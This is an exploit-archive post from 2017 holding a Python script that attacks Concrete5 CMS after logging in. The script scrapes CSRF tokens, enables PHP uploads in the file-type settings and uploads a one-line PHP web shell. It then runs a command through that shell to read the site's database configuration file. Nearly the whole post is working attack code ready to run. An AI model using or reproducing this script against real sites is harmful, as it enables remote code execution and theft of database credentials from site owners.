Concrete5 Proof Of Concept Shell Upload
Posted on 31 May 2017
c@kali:~/src/napalm2.2/modules$ cat shell-concrete5.py #!/usr/bin/env python # shell-concrete5.py - module based on previous version # created 29.04.2017. Bug ('feature') is exploitable only # when you will have a valid credentials. import sys import re import requests target = raw_input("[+] Hostname> ") logMe = target + '/index.php/login' session = requests.session() initreq = session.get(logMe) initresp = initreq.text gettoken = re.compile('<input type="hidden" name="ccm_token" value="(.*?)"/>') found = re.search(gettoken, initresp) if found: token = found.group(1) print '[+] Found token: ' + str(token) # assuming token is valid, let's log in login_data = { 'uName':'user', 'uPassword':'bitnami', 'ccm_token':token } loglink = target + '/index.php/login/authenticate/concrete' loginreq = session.post(loglink, data=login_data) #afterlogin = target + '/index.php/dashboard/system' afterlogin = target + '/index.php/dashboard/system/files/filetypes' nextreq1 = session.get(afterlogin) nextresp1 = nextreq1.text print '[+] Cool, we're logged-in!' #print afterlogin #print nextresp1 print '[+] We are ready to go, extension-page is available.' print '' # construct POST with new.ext newToken = re.compile('<input type="hidden" name="ccm_token" value="(.*?)"/>') foundToken = re.search(newToken, nextresp1) if foundToken: newOne = foundToken.group(1) print '[+] New token grabbed: ' + str(newOne) data_ext = { 'ccm_token':newOne, 'file-access-file-types':'mov,asp,html,yyyy,zzzz,php,newone' } datalink = target + '/index.php/dashboard/system/files/filetypes/file_access_extensions' datareq = session.post(datalink, data=data_ext) dataresp = datareq.text nowwecan = re.compile('file-access-file-types" class="form-control" rows="3">(.*?)</textarea>') newexts = re.search(nowwecan, dataresp) if newexts: print '[+] Available now: '+ newexts.group(1) print '[+] Time to upload shell...' # next token to upload request nextTokenUrl = target + '/index.php/tools/required/files/import?currentFolder=0' tokreq3 = session.get(nextTokenUrl) tokresp3 = tokreq3.text grabNextTok = re.compile('input type="hidden" name="ccm_token" value="(.*?)"/>') foundit = re.search(grabNextTok, tokresp3) if foundit: tokentoup = foundit.group(1) print '[+] Next token (3rd): ' + str( tokentoup ) # we are logged-in; preparing req to upload shell saymyname = 'meshell3.php' fp = open(saymyname,'w') fp.write('<?php system($_GET["xx"]);') fp.close() # tmpshfile ready, do req now up_files = { 'file':open(saymyname,'rb') } up_params = { 'ccm_token':tokentoup, 'filename':saymyname, 'currentFolder':'0' } upreqlink = target + '/index.php/ccm/system/file/upload' upreqnow = session.post(upreqlink, files=up_files, data=up_params) upresp = upreqnow.text if saymyname in upresp: print '[+] Shell properly uploaded. Time to find it ('+str(saymyname)+')' searchme = target + '/index.php/dashboard/files/search' dosearch = session.get(searchme) meresp = dosearch.text searchShLink = re.compile(saymyname+'","urlInline":"http:(.*?)download_file(.*?)view_inline(.*?)","urlDownload":') foundShLink = re.search(searchShLink, meresp) if foundShLink: foundId = foundShLink.group(3) shid = foundId.strip('/') print '[+] Found link ID:' + str(shid) preparingProp = target + '/index.php/ccm/system/dialogs/file/properties?fID='+str(shid) prepreq = session.get(preparingProp) prepresp = prepreq.text whereareutxt = '<a target="_blank" href="(.*?)/application/files/(.*?)' + saymyname +'">' whereareu = re.compile(whereareutxt) foundme2 = re.search(whereareu, prepresp) if foundme2: print '[+] Shell is ready to use:' shellshere = target + '/application/files/' + foundme2.group(2) + '/'+saymyname + '?xx=id;cat ../../../../config/database.php'#id' print ' ' + shellshere print '[+] "Finish him!" ;7' finish = session.get(shellshere) fintxt = finish.text print '[+] Response:' print fintxt print ' ---------------' else: print '[-] I can not upload our shell. Verify!'